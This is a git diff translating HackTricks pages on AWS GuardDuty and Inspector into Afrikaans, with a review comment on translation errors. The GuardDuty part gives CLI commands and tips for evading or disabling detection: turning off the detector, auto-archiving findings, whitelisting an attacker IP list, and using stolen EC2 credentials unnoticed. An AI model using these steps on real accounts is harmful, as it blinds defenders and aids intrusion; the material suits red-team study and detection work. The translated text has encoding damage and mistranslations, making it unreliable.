b/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-guardduty-enum.md 
@@ -4,64 +4,63 @@ ## GuardDuty -According to the [**docs**](https://aws.amazon.com/guardduty/features/): GuardDuty combines **machine learning, anomaly detection, network monitoring, and malicious file discovery**, using both AWS and industry-leading third-party sources to help protect workloads and data on AWS. GuardDuty is capable of analysing tens of billions of events across multiple AWS data sources, such as AWS CloudTrail event logs, Amazon Virtual Private Cloud (VPC) Flow Logs, Amazon Elastic Kubernetes Service (EKS) audit and system-level logs, and DNS query logs. +Volgens die [**docs**](https://aws.amazon.com/guardduty/features/): GuardDuty kombineer **masjienleer, anomaliedetektering, netwerkmonitering, en kwaadwillige lĂȘerontdekking**, met behulp van beide AWS en toonaangewende derdepartybronne om te help om werklading en data op AWS te beskerm. GuardDuty is in staat om tien biljoene gebeurtenisse oor verskeie AWS-databronne te analiseer, soos AWS CloudTrail gebeurtenislogs, Amazon Virtual Private Cloud (VPC) Flow Logs, Amazon Elastic Kubernetes Service (EKS) oudit- en stelselniveau logs, en DNS-vraaglogs. -Amazon GuardDuty **identifies unusual activity within your accounts**, analyses the **security relevanc**e of the activity, and gives the **context** in which it was invoked. This allows a responder to determine if they should spend time on further investigation. +Amazon GuardDuty **identifiseer ongewone aktiwiteit binne jou rekeninge**, analiseer die **veiligheidsrelevansie** van die aktiwiteit, en gee die **konteks** waarin dit geaktiveer is. Dit stel 'n responder in staat om te bepaal of hulle tyd moet spandeer aan verdere ondersoek. -Alerts **appear in the GuardDuty console (90 days)** and CloudWatch Events. +Waarskuwings **verskyn in die GuardDuty-konsol (90 dae)** en CloudWatch Events. 
> [!WARNING] -> When a user **disable GuardDuty**, it will stop monitoring your AWS environment and it won't generate any new findings at all, and the **existing findings will be lost**.\ -> If you just stop it, the existing findings will remain. +> Wanneer 'n gebruiker **GuardDuty deaktiveer**, sal dit ophou om jou AWS-omgewing te monitor en dit sal glad nie nuwe bevindings genereer nie, en die **bestaande bevindings sal verlore gaan**.\ +> As jy dit net stop, sal die bestaande bevindings bly. -### Findings Example +### Bevindinge Voorbeeld -- **Reconnaissance**: Activity suggesting reconnaissance by an attacker, such as **unusual API activity**, suspicious database **login** attempts, intra-VPC **port scanning**, unusual failed login request patterns, or unblocked port probing from a known bad IP. -- **Instance compromise**: Activity indicating an instance compromise, such as **cryptocurrency mining, backdoor command and control (C\&C)** activity, malware using domain generation algorithms (DGA), outbound denial of service activity, unusually **high network** traffic volume, unusual network protocols, outbound instance communication with a known malicious IP, temporary Amazon EC2 credentials used by an external IP address, and data exfiltration using DNS. -- **Account compromise**: Common patterns indicative of account compromise include API calls from an unusual geolocation or anonymizing proxy, attempts to disable AWS CloudTrail logging, changes that weaken the account password policy, unusual instance or infrastructure launches, infrastructure deployments in an unusual region, credential theft, suspicious database login activity, and API calls from known malicious IP addresses. 
-- **Bucket compromise**: Activity indicating a bucket compromise, such as suspicious data access patterns indicating credential misuse, unusual Amazon S3 API activity from a remote host, unauthorized S3 access from known malicious IP addresses, and API calls to retrieve data in S3 buckets from a user with no prior history of accessing the bucket or invoked from an unusual location. Amazon GuardDuty continuously monitors and analyzes AWS CloudTrail S3 data events (e.g. GetObject, ListObjects, DeleteObject) to detect suspicious activity across all of your Amazon S3 buckets. +- **Verkenning**: Aktiwiteit wat verkenning deur 'n aanvaller aandui, soos **ongewone API-aktiwiteit**, verdagte databasis **aanmeld** pogings, intra-VPC **poortskandering**, ongewone mislukte aanmeldversoekpatrone, of onbelemmerde poortprobering vanaf 'n bekende slegte IP. +- **Instansie-kompromie**: Aktiwiteit wat 'n instansie-kompromie aandui, soos **kripto-geldeenheid mynbou, agterdeur opdrag en beheer (C\&C)** aktiwiteit, malware wat domein generasie algoritmes (DGA) gebruik, uitgaande ontkenning van diens aktiwiteit, ongewone **hoĂ« netwerk** verkeersvolume, ongewone netwerkprotokolle, uitgaande instansiekommunikasie met 'n bekende kwaadwillige IP, tydelike Amazon EC2 geloofsbriewe wat deur 'n eksterne IP-adres gebruik word, en data eksfiltrasie met behulp van DNS. +- **Rekening-kompromie**: Algemene patrone wat dui op rekening-kompromie sluit API-oproepe vanaf 'n ongewone geolokasie of anonymiserende proxy in, pogings om AWS CloudTrail logging te deaktiveer, veranderinge wat die rekening wagwoordbeleid verzwak, ongewone instansie of infrastruktuur bekendstellings, infrastruktuurontplooiings in 'n ongewone streek, geloofsbriewe-diefstal, verdagte databasis aanmeldaktiwiteit, en API-oproepe vanaf bekende kwaadwillige IP-adresse. 
+- **Emmer-kompromie**: Aktiwiteit wat 'n emmer-kompromie aandui, soos verdagte data-toegangspatrone wat geloofsbriefmisbruik aandui, ongewone Amazon S3 API-aktiwiteit vanaf 'n afgeleĂ« gasheer, ongeoorloofde S3-toegang vanaf bekende kwaadwillige IP-adresse, en API-oproepe om data in S3-emmers te verkry vanaf 'n gebruiker met geen vorige geskiedenis van toegang tot die emmer of geaktiveer vanaf 'n ongewone ligging. Amazon GuardDuty monitor en analiseer voortdurend AWS CloudTrail S3 data gebeurtenisse (bv. GetObject, ListObjects, DeleteObject) om verdagte aktiwiteit oor al jou Amazon S3-emmers te detecteer.
-Finding Information +Bevinding Inligting -Finding summary: +Bevinding opsomming: -- Finding type -- Severity: 7-8.9 High, 4-6.9 Medium, 01-3.9 Low -- Region -- Account ID -- Resource ID -- Time of detection -- Which threat list was used +- Bevinding tipe +- Ernstigheid: 7-8.9 Hoog, 4-6.9 Medium, 01-3.9 Laag +- Streek +- Rekening ID +- Hulpbron ID +- Tyd van opsporing +- Watter bedreigingslys is gebruik -The body has this information: +Die liggaam het hierdie inligting: -- Resource affected -- Action -- Actor: Ip address, port and domain -- Additional Information +- Hulpbron geraak +- Aksie +- Akteur: IP-adres, poort en domein +- Bykomende Inligting
-### All Findings +### Alle Bevindinge -Access a list of all the GuardDuty findings in: [https://docs.aws.amazon.com/guardduty/latest/ug/guardduty_finding-types-active.html](https://docs.aws.amazon.com/guardduty/latest/ug/guardduty_finding-types-active.html) +Toegang tot 'n lys van al die GuardDuty bevindinge in: [https://docs.aws.amazon.com/guardduty/latest/ug/guardduty_finding-types-active.html](https://docs.aws.amazon.com/guardduty/latest/ug/guardduty_finding-types-active.html) -### Multi Accounts +### Multi Rekeninge -#### By Invitation +#### Deur Uitnodiging -You can **invite other accounts** to a different AWS GuardDuty account so **every account is monitored from the same GuardDuty**. The master account must invite the member accounts and then the representative of the member account must accept the invitation. +Jy kan **ander rekeninge uitnooi** na 'n ander AWS GuardDuty rekening sodat **elke rekening vanaf dieselfde GuardDuty gemonitor word**. Die meesterrekening moet die lidrekeninge uitnooi en dan moet die verteenwoordiger van die lidrekening die uitnodiging aanvaar. -#### Via Organization +#### Via Organisasie -You can designate any account within the organization to be the **GuardDuty delegated administrator**. Only the organization management account can designate a delegated administrator. +Jy kan enige rekening binne die organisasie aanwys om die **GuardDuty gedelegeerde administrateur** te wees. Slegs die organisasie bestuurrekening kan 'n gedelegeerde administrateur aanwys. -An account that gets designated as a delegated administrator becomes a GuardDuty administrator account, has GuardDuty enabled automatically in the designated AWS Region, and also has the **permission to enable and manage GuardDuty for all of the accounts in the organization within that Region**. The other accounts in the organization can be viewed and added as GuardDuty member accounts associated with this delegated administrator account. 
- -## Enumeration +'n Rekening wat as 'n gedelegeerde administrateur aangewys word, word 'n GuardDuty administrateurrekening, het GuardDuty outomaties geaktiveer in die aangewese AWS Streek, en het ook die **toestemming om GuardDuty in te skakel en te bestuur vir al die rekeninge in die organisasie binne daardie Streek**. Die ander rekeninge in die organisasie kan gesien en bygevoeg word as GuardDuty lidrekeninge wat met hierdie gedelegeerde administrateurrekening geassosieer word. +## Enumerasie ```bash # Get Org config aws guardduty list-organization-admin-accounts #Get Delegated Administrator 
@@ -101,85 +100,76 @@ aws guardduty list-publishing-destinations --detector-id aws guardduty list-threat-intel-sets --detector-id aws guardduty get-threat-intel-set --detector-id --threat-intel-set-id ``` - ## GuardDuty Bypass -### General Guidance +### Algemene Riglyne -Try to find out as much as possible about the behaviour of the credentials you are going to use: +Probeer soveel as moontlik uit te vind oor die gedrag van die kredensiale wat jy gaan gebruik: -- Times it's used -- Locations -- User Agents / Services (It could be used from awscli, webconsole, lambda...) -- Permissions regularly used +- Tye wat dit gebruik word +- Ligginge +- Gebruikersagente / Dienste (Dit kan gebruik word vanaf awscli, webconsole, lambda...) +- Toestemmings wat gereeld gebruik word -With this information, recreate as much as possible the same scenario to use the access: +Met hierdie inligting, herleef soveel as moontlik dieselfde scenario om die toegang te gebruik: -- If it's a **user or a role accessed by a user**, try to use it in the same hours, from the same geolocation (even the same ISP and IP if possible) -- If it's a **role used by a service**, create the same service in the same region and use it from there in the same time ranges -- Always try to use the **same permissions** this principal has used -- If you need to **use other permissions or abuse a permission** (for example, download 1.000.000 cloudtrail log files) do it **slowly** and with the **minimum amount of interactions** with AWS (awscli sometime call several read APIs before the write one) +- As dit 'n **gebruiker of 'n rol is wat deur 'n gebruiker toeganklik is**, probeer om dit in dieselfde ure te gebruik, vanaf dieselfde geolokasie (selfs dieselfde ISP en IP indien moontlik) +- As dit 'n **rol is wat deur 'n diens gebruik word**, skep dieselfde diens in dieselfde streek en gebruik dit van daar in dieselfde tydsbereik +- Probeer altyd om die **dieselfde toestemmings** te gebruik wat hierdie prinsiep gebruik 
het +- As jy **ander toestemmings moet gebruik of 'n toestemming moet misbruik** (byvoorbeeld, aflaai van 1.000.000 cloudtrail log lĂȘers) doen dit **stadig** en met die **minimale hoeveelheid interaksies** met AWS (awscli roep soms verskeie lees API's aan voordat die skryf een) -### Breaking GuardDuty +### Breek GuardDuty #### `guardduty:UpdateDetector` -With this permission you could disable GuardDuty to avoid triggering alerts. - +Met hierdie toestemming kan jy GuardDuty deaktiveer om te verhoed dat waarskuwings geaktiveer word. ```bash aws guardduty update-detector --detector-id --no-enable aws guardduty update-detector --detector-id --data-sources S3Logs={Enable=false} ``` - #### `guardduty:CreateFilter` -Attackers with this permission have the capability to **employ filters for the automatic** archiving of findings: - +Aanvallers met hierdie toestemming het die vermoĂ« om **filters te gebruik vir die outomatiese** argivering van bevindings: ```bash aws guardduty create-filter --detector-id --name --finding-criteria file:///tmp/criteria.json --action ARCHIVE ``` - #### `iam:PutRolePolicy`, (`guardduty:CreateIPSet`|`guardduty:UpdateIPSet`) -Attackers with the previous privileges could modify GuardDuty's [**Trusted IP list**](https://docs.aws.amazon.com/guardduty/latest/ug/guardduty_upload-lists.html) by adding their IP address to it and avoid generating alerts. - +Aanvallers met die vorige voorregte kon GuardDuty se [**Vertroude IP lys**](https://docs.aws.amazon.com/guardduty/latest/ug/guardduty_upload-lists.html) wysig deur hul IP adres daaraan toe te voeg en sodoende die generering van waarskuwings te vermy. 
```bash aws guardduty update-ip-set --detector-id --activate --ip-set-id --location https://some-bucket.s3-eu-west-1.amazonaws.com/attacker.csv ``` - #### `guardduty:DeletePublishingDestination` -Attackers could remove the destination to prevent alerting: - +Aanvallers kan die bestemming verwyder om waarskuwings te voorkom: ```bash aws guardduty delete-publishing-destination --detector-id --destination-id ``` - > [!CAUTION] -> Deleting this publishing destination will **not affect the generation or visibility of findings within the GuardDuty console**. GuardDuty will continue to analyze events in your AWS environment, identify suspicious or unexpected behavior, and generate findings. +> Die verwydering van hierdie publikasiebestemming sal **nie die generasie of sigbaarheid van bevindings binne die GuardDuty-konsol beĂŻnvloed nie**. GuardDuty sal voortgaan om gebeurtenisse in jou AWS-omgewing te analiseer, verdagte of onverwagte gedrag te identifiseer, en bevindings te genereer. -### Specific Findings Bypass Examples +### Spesifieke Bevinding Bypass Voorbeelde -Note that there are tens of GuardDuty findings, however, **as Red Teamer not all of them will affect you**, and what is better, you have the f**ull documentation of each of them** in [https://docs.aws.amazon.com/guardduty/latest/ug/guardduty_finding-types-active.html](https://docs.aws.amazon.com/guardduty/latest/ug/guardduty_finding-types-active.html) so take a look before doing any action to not get caught. +Let daarop dat daar tientalle GuardDuty bevindings is, egter, **as 'n Red Teamer sal nie almal jou beĂŻnvloed nie**, en wat beter is, jy het die **volledige dokumentasie van elk van hulle** in [https://docs.aws.amazon.com/guardduty/latest/ug/guardduty_finding-types-active.html](https://docs.aws.amazon.com/guardduty/latest/ug/guardduty_finding-types-active.html) so kyk na hulle voordat jy enige aksie onderneem om nie gevang te word nie. 
-Here you have a couple of examples of specific GuardDuty findings bypasses: +Hier is 'n paar voorbeelde van spesifieke GuardDuty bevindinge bypasses: #### [PenTest:IAMUser/KaliLinux](https://docs.aws.amazon.com/guardduty/latest/ug/guardduty_finding-types-iam.html#pentest-iam-kalilinux) -GuardDuty detect AWS API requests from common penetration testing tools and trigger a [PenTest Finding](https://docs.aws.amazon.com/guardduty/latest/ug/guardduty_finding-types-iam.html#pentest-iam-kalilinux).\ -It's detected by the **user agent name** that is passed in the API request.\ -Therefore, **modifying the user agent** it's possible to prevent GuardDuty from detecting the attack. +GuardDuty detect AWS API versoeke van algemene penetrasietoets gereedskap en aktiveer 'n [PenTest Finding](https://docs.aws.amazon.com/guardduty/latest/ug/guardduty_finding-types-iam.html#pentest-iam-kalilinux).\ +Dit word opgespoor deur die **gebruikersagentnaam** wat in die API versoek oorgedra word.\ +Daarom, **om die gebruikersagent te wysig** is dit moontlik om GuardDuty te verhoed om die aanval te detecteer. -To prevent this you can search from the script `session.py` in the `botocore` package and modify the user agent, or set Burp Suite as the AWS CLI proxy and change the user-agent with the MitM or just use an OS like Ubuntu, Mac or Windows will prevent this alert from triggering. +Om dit te voorkom kan jy soek vanaf die skrip `session.py` in die `botocore` pakket en die gebruikersagent wysig, of Burp Suite as die AWS CLI proxy stel en die gebruikersagent met die MitM verander of net 'n OS soos Ubuntu, Mac of Windows gebruik sal voorkom dat hierdie waarskuwing geaktiveer word. 
#### UnauthorizedAccess:IAMUser/InstanceCredentialExfiltration -Extracting EC2 credentials from the metadata service and **utilizing them outside** the AWS environment activates the [**`UnauthorizedAccess:IAMUser/InstanceCredentialExfiltration.OutsideAWS`**](https://docs.aws.amazon.com/guardduty/latest/ug/guardduty_finding-types-iam.html#unauthorizedaccess-iam-instancecredentialexfiltrationoutsideaws) alert. Conversely, employing these credentials from your EC2 instance triggers the [**`UnauthorizedAccess:IAMUser/InstanceCredentialExfiltration.InsideAWS`**](https://docs.aws.amazon.com/guardduty/latest/ug/guardduty_finding-types-iam.html#unauthorizedaccess-iam-instancecredentialexfiltrationinsideaws) alert. Yet, **using the credentials on another compromised EC2 instance within the same account goes undetected**, raising no alert. +Die onttrekking van EC2 geloofsbriewe uit die metadata diens en **dit buite** die AWS-omgewing gebruik aktiveer die [**`UnauthorizedAccess:IAMUser/InstanceCredentialExfiltration.OutsideAWS`**](https://docs.aws.amazon.com/guardduty/latest/ug/guardduty_finding-types-iam.html#unauthorizedaccess-iam-instancecredentialexfiltrationoutsideaws) waarskuwing. Omgekeerd, die gebruik van hierdie geloofsbriewe vanaf jou EC2 instance aktiveer die [**`UnauthorizedAccess:IAMUser/InstanceCredentialExfiltration.InsideAWS`**](https://docs.aws.amazon.com/guardduty/latest/ug/guardduty_finding-types-iam.html#unauthorizedaccess-iam-instancecredentialexfiltrationinsideaws) waarskuwing. Tog, **die gebruik van die geloofsbriewe op 'n ander gecompromitteerde EC2 instance binne dieselfde rekening gaan ongemerk**, wat geen waarskuwing veroorsaak nie. > [!TIP] -> Therefore, **use the exfiltrated credentials from inside the machine** where you found them to not trigger this alert. +> Daarom, **gebruik die onttrokken geloofsbriewe van binne die masjien** waar jy dit gevind het om nie hierdie waarskuwing te aktiveer nie. 
-## References +## Verwysings - [https://docs.aws.amazon.com/guardduty/latest/ug/guardduty_finding-types-active.html](https://docs.aws.amazon.com/guardduty/latest/ug/guardduty_finding-types-active.html) - [https://docs.aws.amazon.com/guardduty/latest/ug/findings_suppression-rule.html](https://docs.aws.amazon.com/guardduty/latest/ug/findings_suppression-rule.html) @@ -191,7 +181,3 @@ Extracting EC2 credentials from the metadata service and **utilizing them outsid - [https://docs.aws.amazon.com/whitepapers/latest/aws-privatelink/what-are-vpc-endpoints.html](https://docs.aws.amazon.com/whitepapers/latest/aws-privatelink/what-are-vpc-endpoints.html) {{#include ../../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-inspector-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-inspector-enum.md index 655b81fa7..bc2879a74 100644 --- a/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-inspector-enum.md +++ b/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-inspector-enum.md 
@@ -6,53 +6,53 @@ ### Inspector -Amazon Inspector is an advanced, automated vulnerability management service designed to enhance the security of your AWS environment. This service continuously scans Amazon EC2 instances, container images in Amazon ECR, Amazon ECS, and AWS Lambda functions for vulnerabilities and unintended network exposure. By leveraging a robust vulnerability intelligence database, Amazon Inspector provides detailed findings, including severity levels and remediation recommendations, helping organizations proactively identify and address security risks. This comprehensive approach ensures a fortified security posture across various AWS services, aiding in compliance and risk management. +Amazon Inspector is 'n gevorderde, geoutomatiseerde kwesbaarheidbestuurdiens wat ontwerp is om die sekuriteit van jou AWS-omgewing te verbeter. Hierdie diens skandeer deurlopend Amazon EC2-instances, houerbeelde in Amazon ECR, Amazon ECS, en AWS Lambda-funksies vir kwesbaarhede en onbedoelde netwerkblootstelling. Deur 'n robuuste kwesbaarheidintelligensiedatabasis te benut, bied Amazon Inspector gedetailleerde bevindings, insluitend ernsvlakke en herstelaanbevelings, wat organisasies help om proaktief sekuriteitsrisiko's te identifiseer en aan te spreek. Hierdie omvattende benadering verseker 'n versterkte sekuriteitsposisie oor verskeie AWS-dienste, wat help met nakoming en risiko-bestuur. ### Key elements #### Findings -Findings in Amazon Inspector are detailed reports about vulnerabilities and exposures discovered during the scan of EC2 instances, ECR repositories, or Lambda functions. Based on its state, findings are categorized as: +Findings in Amazon Inspector is gedetailleerde verslae oor kwesbaarhede en blootstellings wat tydens die skandering van EC2-instances, ECR-bewaarplekke, of Lambda-funksies ontdek is. Gebaseer op sy toestand, word findings gekategoriseer as: -- **Active**: The finding has not been remediated. 
-- **Closed**: The finding has been remediated. -- **Suppressed**: The finding has been marked with this state due to one or more **suppression rules**. +- **Aktief**: Die bevinding is nie herstel nie. +- **Gesluit**: Die bevinding is herstel. +- **Onderdruk**: Die bevinding is met hierdie toestand gemerk weens een of meer **onderdrukking reĂ«ls**. -Findings are also categorized into the next three types: +Findings word ook in die volgende drie tipes gekategoriseer: -- **Package**: These findings relate to vulnerabilities in software packages installed on your resources. Examples include outdated libraries or dependencies with known security issues. -- **Code**: This category includes vulnerabilities found in the code of applications running on your AWS resources. Common issues are coding errors or insecure practices that could lead to security breaches. -- **Network**: Network findings identify potential exposures in network configurations that could be exploited by attackers. These include open ports, insecure network protocols, and misconfigured security groups. +- **Pakket**: Hierdie findings hou verband met kwesbaarhede in sagtewarepakkette wat op jou hulpbronne geĂŻnstalleer is. Voorbeelde sluit verouderde biblioteke of afhanklikhede met bekende sekuriteitskwessies in. +- **Kode**: Hierdie kategorie sluit kwesbaarhede in die kode van toepassings wat op jou AWS-hulpbronne loop in. Algemene probleme is koderingfoute of onveilige praktyke wat tot sekuriteitsbreuke kan lei. +- **Netwerk**: Netwerk findings identifiseer potensiĂ«le blootstellings in netwerkkonfigurasies wat deur aanvallers uitgebuit kan word. Hierdie sluit oop poorte, onveilige netwerkprotokolle, en verkeerd geconfigureerde sekuriteitsgroepe in. #### Filters and Suppression Rules -Filters and suppression rules in Amazon Inspector help manage and prioritize findings. Filters allow you to refine findings based on specific criteria, such as severity or resource type. 
Suppression rules allow you to suppress certain findings that are considered low risk, have already been mitigated, or for any other important reason, preventing them from overloading your security reports and allowing you to focus on more critical issues. +Filters en onderdrukking reĂ«ls in Amazon Inspector help om findings te bestuur en te prioriseer. Filters laat jou toe om findings te verfyn op grond van spesifieke kriteria, soos erns of hulpbron tipe. Onderdrukking reĂ«ls laat jou toe om sekere findings wat as lae risiko beskou word, wat reeds gemitigeer is, of vir enige ander belangrike rede, te onderdruk, wat voorkom dat hulle jou sekuriteitsverslae oorlaai en jou toelaat om op meer kritieke kwessies te fokus. #### Software Bill of Materials (SBOM) -A Software Bill of Materials (SBOM) in Amazon Inspector is an exportable nested inventory list detailing all the components within a software package, including libraries and dependencies. SBOMs help provide transparency into the software supply chain, enabling better vulnerability management and compliance. They are crucial for identifying and mitigating risks associated with open source and third-party software components. +A Software Bill of Materials (SBOM) in Amazon Inspector is 'n uitvoerbare geneste inventarislis wat al die komponente binne 'n sagtewarepakket, insluitend biblioteke en afhanklikhede, in detail uiteensit. SBOMs help om deursigtigheid in die sagteware voorsieningsketting te bied, wat beter kwesbaarheidbestuur en nakoming moontlik maak. Hulle is van kardinale belang om risiko's wat verband hou met oopbron en derdeparty-sagtewarekomponente te identifiseer en te mitigeer. ### Key features #### Export findings -Amazon Inspector offers the capability to export findings to Amazon S3 Buckets, Amazon EventBridge and AWS Security Hub, which enables you to generate detailed reports of identified vulnerabilities and exposures for further analysis or sharing at a specific date and time. 
This feature supports various output formats such as CSV and JSON, making it easier to integrate with other tools and systems. The export functionality allows customization of the data included in the reports, enabling you to filter findings based on specific criteria like severity, resource type, or date range and including by default all of your findings in the current AWS Region with an Active status. +Amazon Inspector bied die vermoĂ« om findings na Amazon S3 Buckets, Amazon EventBridge en AWS Security Hub te uitvoer, wat jou in staat stel om gedetailleerde verslae van geĂŻdentifiseerde kwesbaarhede en blootstellings vir verdere analise of deel op 'n spesifieke datum en tyd te genereer. Hierdie kenmerk ondersteun verskeie uitvoerformate soos CSV en JSON, wat dit makliker maak om met ander gereedskap en stelsels te integreer. Die uitvoerfunksionaliteit laat aanpassing van die data wat in die verslae ingesluit is toe, wat jou in staat stel om findings te filter op grond van spesifieke kriteria soos erns, hulpbron tipe, of datumbereik en sluit standaard al jou findings in die huidige AWS Region met 'n Aktiewe status in. -When exporting findings, a Key Management Service (KMS) key is necessary to encrypt the data during export. KMS keys ensure that the exported findings are protected against unauthorized access, providing an extra layer of security for sensitive vulnerability information. +Wanneer findings uitgevoer word, is 'n Key Management Service (KMS) sleutel nodig om die data tydens uitvoer te enkripteer. KMS sleutels verseker dat die uitgevoerde findings teen ongemagtigde toegang beskerm word, wat 'n ekstra laag sekuriteit vir sensitiewe kwesbaarheidinligting bied. #### Amazon EC2 instances scanning -Amazon Inspector offers robust scanning capabilities for Amazon EC2 instances to detect vulnerabilities and security issues. 
Inspector compared extracted metadata from the EC2 instance against rules from security advisories in order to produce package vulnerabilities and network reachability issues. These scans can be performed through **agent-based** or **agentless** methods, depending on the **scan mode** settings configuration of your account. +Amazon Inspector bied robuuste skandeervermoĂ«ns vir Amazon EC2-instances om kwesbaarhede en sekuriteitskwessies te ontdek. Inspector het onttrokken metadata van die EC2-instance vergelyk met reĂ«ls van sekuriteitsadvies om pakketskwesbaarhede en netwerkbereikbaarheidkwessies te produseer. Hierdie skanderings kan uitgevoer word deur **agent-gebaseerde** of **agentlose** metodes, afhangende van die **skandeermodus** instellingskonfigurasie van jou rekening. -- **Agent-Based**: Utilizes the AWS Systems Manager (SSM) agent to perform in-depth scans. This method allows for comprehensive data collection and analysis directly from the instance. -- **Agentless**: Provides a lightweight alternative that does not require installing an agent on the instance, creating an EBS snapshot of every volume of the EC2 instance, looking for vulnerabilities, and then deleting it; leveraging existing AWS infrastructure for scanning. +- **Agent-GeBASEER**: Gebruik die AWS Systems Manager (SSM) agent om diepgaande skanderings uit te voer. Hierdie metode laat vir omvattende dataversameling en -analise direk vanaf die instance toe. +- **Agentlose**: Bied 'n liggewig alternatief wat nie die installering van 'n agent op die instance vereis nie, deur 'n EBS-snapshots van elke volume van die EC2-instance te skep, op soek na kwesbaarhede, en dit dan te verwyder; benut bestaande AWS-infrastruktuur vir skandering. -The scan mode determines which method will be used to perform EC2 scans: +Die skandeermodus bepaal watter metode gebruik sal word om EC2-skanderings uit te voer: -- **Agent-Based**: Involves installing the SSM agent on EC2 instances for deep inspection. 
-- **Hybrid Scanning**: Combines both agent-based and agentless methods to maximize coverage and minimize performance impact. In those EC2 instances where the SSM agent is installed, Inspector will perform an agent-based scan, and for those where there is no SSM agent, the scan performed will be agentless. +- **Agent-GeBASEER**: Betrek die installering van die SSM-agent op EC2-instances vir diep inspeksie. +- **Hibrid Skandering**: Kombineer beide agent-gebaseerde en agentlose metodes om dekking te maksimeer en prestasie-impak te minimaliseer. In daardie EC2-instances waar die SSM-agent geĂŻnstalleer is, sal Inspector 'n agent-gebaseerde skandering uitvoer, en vir diegene waar daar geen SSM-agent is nie, sal die skandering agentloos wees. -Another important feature is the **deep inspection** for EC2 Linux instances. This feature offers thorough analysis of the software and configuration of EC2 Linux instances, providing detailed vulnerability assessments, including operating system vulnerabilities, application vulnerabilities, and misconfigurations, ensuring a comprehensive security evaluation. This is achieved through the inspection of **custom paths** and all of its sub-directories. By default, Amazon Inspector will scan the following, but each member account can define up to 5 more custom paths, and each delegated administrator up to 10: +Nog 'n belangrike kenmerk is die **diep inspeksie** vir EC2 Linux-instances. Hierdie kenmerk bied deeglike analise van die sagteware en konfigurasie van EC2 Linux-instances, wat gedetailleerde kwesbaarheidbeoordelings bied, insluitend bedryfstelsels kwesbaarhede, toepassings kwesbaarhede, en verkeerd konfigureerde instellings, wat 'n omvattende sekuriteitsbeoordeling verseker. Dit word bereik deur die inspeksie van **aangepaste paaie** en al sy sub-gidse. 
Standaard sal Amazon Inspector die volgende skandeer, maar elke lidrekening kan tot 5 meer aangepaste paaie definieer, en elke gedelegeerde administrateur tot 10: - `/usr/lib` - `/usr/lib64` 
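Review bot: the added EC2 scan-mode bullets in this hunk carry translation glitches that should be fixed before merge. `Agent-GeBASEER` (used twice, in the method list and again in the scan-mode list) has stray capitalisation; the same lines already use `agent-gebaseerde`, so `Agent-gebaseerd` is the consistent label. `Hibrid Skandering` should read `Hibriede Skandering`, and `Inspector het onttrokken metadata van die EC2-instance vergelyk` uses a Dutch participle and the past tense where the English line is present tense; `Inspector vergelyk onttrekte metadata van die EC2-instance` keeps the meaning. Several added lines in this hunk also show mojibake for accented characters (`reĂ«ls`, `vermoĂ«ns`, `geĂŻdentifiseerde` where `reëls`, `vermoëns`, `geïdentifiseerde` are meant); please confirm the file is committed as UTF-8, since the same pattern repeats through the rest of the file.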
@@ -61,28 +61,27 @@ Another important feature is the **deep inspection** for EC2 Linux instances. Th #### Amazon ECR container images scanning -Amazon Inspector provides robust scanning capabilities for Amazon Elastic Container Registry (ECR) container images, ensuring that package vulnerabilities are detected and managed efficiently. +Amazon Inspector bied robuuste skandeervermoĂ«ns vir Amazon Elastic Container Registry (ECR) houerbeelde, wat verseker dat pakketskwesbaarhede doeltreffend ontdek en bestuur word. -- **Basic Scanning**: This is a quick and lightweight scan that identifies known OS packages vulnerabilities in container images using a standard set of rules from the open-source Clair project. With this scanning configuration, your repositories will be scanned on push, or performing manual scans. -- **Enhanced Scanning**: This option adds the continuous scanning feature in addition to the on push scan. Enhanced scanning dives deeper into the layers of each container image to identify vulnerabilities in OS packages and in programming languages packages with higher accuracy. It analyzes both the base image and any additional layers, providing a comprehensive view of potential security issues. +- **Basiese Skandering**: Dit is 'n vinnige en liggewig skandering wat bekende OS-pakketskwesbaarhede in houerbeelde identifiseer met behulp van 'n standaard stel reĂ«ls van die oopbron Clair-projek. Met hierdie skandeer konfigurasie, sal jou bewaringe geskanteer word op druk, of deur handmatige skanderings uit te voer. +- **Verbeterde Skandering**: Hierdie opsie voeg die deurlopende skandeerfunksie by, benewens die op druk skandering. Verbeterde skandering delf dieper in die lae van elke houerbeeld om kwesbaarhede in OS-pakkette en in programmeringstaal pakkette met hoĂ«r akkuraatheid te identifiseer. Dit analiseer beide die basisbeeld en enige addisionele lae, wat 'n omvattende oorsig van potensiĂ«le sekuriteitskwessies bied. 
#### Amazon Lambda functions scanning -Amazon Inspector includes comprehensive scanning capabilities for AWS Lambda functions and its layers, ensuring the security and integrity of serverless applications. Inspector offers two types of scanning for Lambda functions: +Amazon Inspector sluit omvattende skandeervermoĂ«ns vir AWS Lambda-funksies en sy lae in, wat die sekuriteit en integriteit van serverless toepassings verseker. Inspector bied twee tipes skandering vir Lambda-funksies: -- **Lambda standard scanning**: This default feature identifies software vulnerabilities in the application package dependencies added to your Lambda function and layers. For instance, if your function uses a version of a library like python-jwt with a known vulnerability, it generates a finding. -- **Lambda code scanning**: Analyzes custom application code for security issues, detecting vulnerabilities like injection flaws, data leaks, weak cryptography, and missing encryption. It captures code snippets highlighting detected vulnerabilities, such as hardcoded credentials. Findings include detailed remediation suggestions and code snippets for fixing the issues. +- **Lambda standaard skandering**: Hierdie standaard kenmerk identifiseer sagtewarekwesbaarhede in die toepassingspakket afhanklikhede wat by jou Lambda-funksie en lae gevoeg is. Byvoorbeeld, as jou funksie 'n weergawe van 'n biblioteek soos python-jwt met 'n bekende kwesbaarheid gebruik, genereer dit 'n bevinding. +- **Lambda kode skandering**: Analiseer aangepaste toepassingskode vir sekuriteitskwessies, wat kwesbaarhede soos inspuitingsfoute, datalekke, swak kriptografie, en ontbrekende enkripsie opspoor. Dit vang kode-snippets wat gedetecteerde kwesbaarhede uitlig, soos hardgecodeerde akrediteer. Findings sluit gedetailleerde herstelvoorstelle en kode-snippets vir die regstelling van die kwessies in. 
